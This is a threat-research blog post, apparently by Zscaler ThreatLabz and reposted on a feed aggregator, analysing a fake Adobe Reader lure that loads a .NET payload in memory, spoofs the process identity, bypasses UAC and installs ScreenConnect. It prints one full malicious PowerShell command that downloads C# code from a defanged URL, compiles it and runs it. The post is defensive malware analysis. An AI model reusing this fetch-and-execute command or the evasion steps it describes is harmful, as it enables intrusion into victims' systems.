惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Martin Fowler
Martin Fowler
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
T
Troy Hunt's Blog
Latest news
Latest news
Vercel News
Vercel News
S
SegmentFault 最新的问题
V
Vulnerabilities – Threatpost
博客园 - Franky
P
Privacy International News Feed
A
Arctic Wolf
T
The Blog of Author Tim Ferriss
S
Schneier on Security
T
The Exploit Database - CXSecurity.com
P
Palo Alto Networks Blog
T
Tor Project blog
Jina AI
Jina AI
GbyAI
GbyAI
The Hacker News
The Hacker News
博客园 - 叶小钗
Google DeepMind News
Google DeepMind News
T
Threatpost
C
CERT Recently Published Vulnerability Notes
P
Proofpoint News Feed
Scott Helme
Scott Helme
WordPress大学
WordPress大学
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Microsoft Azure Blog
Microsoft Azure Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
博客园 - 司徒正美
A
About on SuperTechFans
Recorded Future
Recorded Future
爱范儿
爱范儿
L
LangChain Blog
V
V2EX
C
Cybersecurity and Infrastructure Security Agency CISA
The Cloudflare Blog
阮一峰的网络日志
阮一峰的网络日志
K
Kaspersky official blog
Webroot Blog
Webroot Blog
Security Archives - TechRepublic
Security Archives - TechRepublic
D
DataBreaches.Net
宝玉的分享
宝玉的分享
Google Online Security Blog
Google Online Security Blog
C
Cisco Blogs
L
Lohrmann on Cybersecurity
Help Net Security
Help Net Security
AWS News Blog
AWS News Blog
M
MIT News - Artificial intelligence
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
G
GRAHAM CLULEY

Security Research | Blog

ClaudeFix: Shared Claude Chats Meet ClickFix | Zscaler Why Do F1 Teams Need Cybersecurity, and What Is AI’s Role? Indirect Prompt Injection Targets AI Agents | ThreatLabz Splunk Enterprise RCE (CVE-2026-20253) | ThreatLabz Edgecution: Malicious Edge Extension Backdoor | ThreatLabz SmartApeSG Supply Chain Attack Targets Okendo | ThreatLabz AI Generated ClickFix Attack Delivers SmartRAT | ThreatLabz What the ThreatLabz 2026 Phishing and Initial Access Report Means for the Public Sector | Zscaler Shai-Hulud: Miasma, Hades, & AI Scanner Evasion | ThreatLabz Zscaler ThreatLabz 2026 Phishing and Initial Access Report Technical Analysis of MLTBackdoor | ThreatLabz When the Scanner Starts Thinking: Learnings from Mythos & GPT 5.5 Cyber in Security Testing | Zscaler OpenClaw Skill Distributes Remcos & GhostLoader | ThreatLabz Tropic Trooper: AdaptixC2 + Custom Beacon | ThreatLabz Do not delete blog (testing) | Zscaler Payouts King Takes Aim at the Ransomware Throne | ThreatLabz The Alibaba Incident and Why Zero Trust Matters More Than Ever Supply Chain Attacks Surge in March 2026 | ThreatLabz Claude Code Leak: Critical AI Security Threat 2026 Latest Xloader Obfuscation Code & C2 Protocol | ThreatLabz CVE-2026-20131: Analysis of FMC RCE | ThreatLabz Technical Analysis of SnappyClient | ThreatLabz China-nexus Group Targets Arabian Gulf Region | ThreatLabz Middle East Conflict Fuels Cyber Attacks | ThreatLabz Dust Specter APT Targets Gov’t Officials in Iraq | ThreatLabz APT37 Adds New Tools For Air-Gapped Networks | ThreatLabz GuLoader Malware Obfuscation Techniques Analyzed GuLoader Obfuscation Analysis | ThreatLabz Technical Analysis of Marco Stealer | ThreatLabz Latest Public Sector AI Adoption Trends: What Government, Healthcare, and Education Security Teams Need to Know | Zscaler Operation Neusploit: APT28 Uses CVE-2026-21509 | ThreatLabz 7 Predictions for 2026 | Zscaler SHEETCREEP, FIREPOWER, and MAILCREEP Analysis | ThreatLabz AI is Now Default Enterprise Accelerator: Takeaways from ThreatLabz 2026 AI Security Report | Zscaler GOGITTER, GITSHELLPAD, and GOSHELL Analysis | ThreatLabz Malicious NPM Packages Deliver NodeCordRAT | ThreatLabz What’s Powering Enterprise AI in 2025: ThreatLabz Report Sneak Peek | Zscaler BlindEagle Deploys Caminho and DCRAT | ThreatLabz Technical Analysis of the BlackForce Phishing Kit | ThreatLabz React2Shell RCE Vulnerability (CVE-2025-55182) | ThreatLabz Shai-Hulud V2 Poses Risk to NPM Supply Chain | ThreatLabz Technical Analysis of Matanbuchus 3.0 | ThreatLabz In-Depth Analysis: Water Gamayun APT Multi-Stage Attack Uncovered CVE-2025-50165: Windows Graphics Component Flaw | ThreatLabz Mobile, IoT, and OT Risks Converge in the Public Sector | Zscaler Industry Attacks Surge, Mobile Malware Spreads: The ThreatLabz 2025 Mobile, IoT & OT Report | Zscaler Zscaler Discovers Vulnerability in Keras Models Allowing Arbitrary File Access and SSRF (CVE-2025-12058) | Zscaler F5 Security Incident Advisory | Zscaler Under the Radar: How Non-Web Protocols Are Redefining the Attack Surface | Zscaler SEO Poisoning Targets Ivanti VPN: Credential Theft Alert Cisco Firewall and VPN Zero Day Attacks | ThreatLabz COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz YiBackdoor: Linked to IcedID and Latrodectus | ThreatLabz Technical Analysis of Zloader Updates | ThreatLabz Mitigating Risks from the Shai-Hulud NPM Worm | ThreatLabz Malicious PyPI Packages Deliver SilentSync RAT | ThreatLabz Technical Analysis of SmokeLoader Version 2025 | ThreatLabz Technical Analysis of kkRAT | ThreatLabz APT37: Rust Backdoor & Python Loader | ThreatLabz Anatsa’s Latest Updates | ThreatLabz Termncolor and Colorinal Explained | ThreatLabz GenAI Used to Impersonate Brazil’s Govt Websites | ThreatLabz Tracking Updates to Raspberry Robin | ThreatLabz Ransomware Surges, Extortion Escalates: ThreatLabz 2025 Ransomware Report | Zscaler China-nexus APT Targets the Tibetan Community | ThreatLabz CVE-2025-53770 | ThreatLabz Black Hat SEO Poisoning Search Engine Results For AI | ThreatLabz
In-Memory Loader Drops ScreenConnect | ThreatLabz
Kaivalya Khursale · 2026-04-09 · via Security Research | Blog

Technical Analysis

In this section, ThreatLabz breaks down each step of the attack chain. We begin with a high-level overview and then examine the lure, obfuscated scripts, in-memory payload execution, evasion techniques, and the final deployment of ScreenConnect.

Attack chain

The figure below illustrates the attack chain observed by ThreatLabz.

Attack chain for the fileless ScreenConnect deployment.

Figure 1: Attack chain for the ScreenConnect deployment.

Lure

The attack chain observed by ThreatLabz begins when a victim lands on a site that impersonates Adobe and offers a fake Adobe Acrobat Reader download as shown below. 

Fraudulent page impersonating Adobe.

Figure 2: Fraudulent page impersonating Adobe.

Upon accessing the page, the victim’s browser automatically downloads a heavily obfuscated VBScript file named Acrobat_Reader_V112_6971.vbs, which serves as a loader.

VBScript loader

The VBScript loader is highly obfuscated and intentionally tries to hide its behavior and artifacts to thwart static analysis. For example, rather than directly creating WScript.Shell, the VBScript loader dynamically constructs the object name using nested Replace() functions applied to a long, meaningless string. This prevents the name from appearing in cleartext so that it is not visible in the script at a glance. The resulting object is assigned to a randomly named variable. The VBScript loader then uses Run() to execute a follow-on command that is assembled from numerous Chr() calls with arithmetic expressions. Each call resolves to an ASCII character during execution. The parameters 0 and True run the command in a hidden window and force the script to wait until it completes. The figure below shows the downloaded VBScript loader payload.

Downloaded VBScript payload masquerading as an Adobe Acrobat Reader installer.

Figure 3: Downloaded VBScript payload masquerading as an Adobe Acrobat Reader installer.

PowerShell staging/loader

The VBScript loader launches PowerShell with -ExecutionPolicy Bypass. This allows the loader to run even if the victim’s system is set up with local policies that would typically block such executions from running. The PowerShell command creates a directory and suppresses output via Out-Null, downloads a file from Google Drive, sleeps for eight seconds, reads the file contents into memory, and sleeps briefly again. The PowerShell command then uses Add-Type with -ReferencedAssemblies to compile the in-memory C# source. Since -ReferencedAssemblies provides the libraries required for compilation, this means that the .NET can run without any of the results (i.e. the compiled payload) being written to disk.

The PowerShell command is shown below. 

powershell.exe -ExecutionPolicy Bypass -command ""New-Item -ItemType Directory -Path 'C:\Windows\Temp' -Force | Out-Null; curl.exe -L 'https://drive.google[.]com/uc?id=1TVJir-OlNZrLjm5FyBMk_hDjG9BV1zCy&export=download' -o 'C:\Windows\Temp\FileR.txt';Start-Sleep -Seconds 8;$source = [System.IO.File]::ReadAllText('C:\Windows\Temp\FileR.txt');Start-Sleep -Seconds 1;Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $source -Language CSharp; [HelloWorld]::SayHello()""


In-memory .NET loader

The PowerShell command enables execution by compiling and loading the .NET loader entirely in-memory. This effectively prevents the payload from being written to disk where it can later be recovered and analyzed. The loader defines a HelloWorld class with a large byte array (Buff) that contains an embedded assembly. The loader then uses SayHello() and reflection to load the assembly via Assembly.Load(byte[]) and invoke the assembly’s entry point using EntryPoint.Invoke(). The figure below shows the C# code that embeds the compiled .NET assembly.

Example of C# code embedding a compiled .NET assembly.

Figure 4: Example of C# code embedding a compiled .NET assembly.

ThreatLabz observed that the attackers tried to avoid static analysis by splitting up method and type names. For example, "Lo"+"ad" (i.e. “Load”) and "Ent"+"ryPo"+"int" (i.e. “EntryPoint”). The attackers also used dynamic loading which is a common technique employed during attacks. The following figure shows how the loader’s C# code uses reflection to load an embedded assembly into memory and execute its entry point.

Reflection-based loading and execution of an embedded .NET assembly in-memory.

Figure 5: Reflection-based loading and execution of an embedded .NET assembly in-memory.

To avoid being detected, the attackers carefully blend in with legitimate activity like normal system processes. For example, the loader implements a 64-bit Windows PEB-retrieval routine by allocating executable memory and staging a small x64 shellcode stub. The loader uses a custom resolver to locate NtAllocateVirtualMemory in ntdll.dll (which is often preferred over VirtualAlloc to reduce exposure to user-mode hooks and security monitoring). The shellcode is set up as a byte array. The byte array is copied into the allocated memory using a Marshal.Copy call. Once this is in place, a pointer to that buffer is returned so it can be executed. This allows the code to obtain the PEB address, as shown in the figure below.

Code that obtains the memory address of the PEB.

Figure 6: Code that obtains the memory address of the PEB.

After retrieving the PEB address, the loader performs image-name spoofing (process masquerading) by rewriting PEB fields that store the process image path and name. This lets the process misrepresent its identity to user-mode tools and security controls that rely on PEB-reported metadata, thus helping the loader blend in with legitimate Windows binaries.

The loader retrieves the process PEB and handles 32-bit (WOW64) and 64-bit layouts separately. It then accesses the loader data (Ldr) and walks InLoadOrderModuleList to locate the entry for the process image. Once the loader identifies it, it enters a critical section to safely modify the structure by overwriting FullDllName and BaseDllName to C:\Windows\winhlp32.exe / winhlp32.exe before releasing the lock. The figure below shows the code that modifies the PEB to masquerade the process identity.

Code that modifies the PEB to masquerade the process identity.

Figure 7: Code that modifies the PEB to masquerade the process identity.

UAC bypass via elevated COM objects

ThreatLabz observed that the attackers leveraged the loader to abuse Windows’ auto-elevated COM behavior. This gave the attackers elevated privileges without ever prompting the victim. The loader takes a COM class ID (CLSID) and interface ID, then constructs an elevation moniker (effectively “run as Administrator”). To hinder basic signature scanning, the moniker string is stored reversed and flipped at runtime. The loader then calls CoGetObject to request the elevated COM object. If this action is successful, the loader returns an interface that can be used for privileged actions by the attackers, otherwise it returns null. The figure below shows the code attempting to obtain an elevated COM object for privilege escalation.

Code attempting to obtain an elevated COM object for privilege escalation.

Figure 8: Code attempting to obtain an elevated COM object for privilege escalation.

ScreenConnect deployment

The final stage of the attack uses a PowerShell command, which decodes at runtime, that creates the C:\Temp directory (if not present). Inside that directory, the loader Uses curl.exe to download the ScreenConnect installer from x0[.]at/qOfN.msi (ScreenConnect.ClientSetup.msi). The PowerShell command then uses ShellExec to run the installer and launches it via msiexec. Once that finishes, the loader releases the COM object and the attack chain is complete. At this point, ScreenConnect is installed on the victim’s system. The PowerShell command is shown in the figure below.

PowerShell command that downloads ScreenConnect.ClientSetup.msi and installs it via msiexec.

Figure 9: PowerShell command that downloads ScreenConnect.ClientSetup.msi and installs it via msiexec.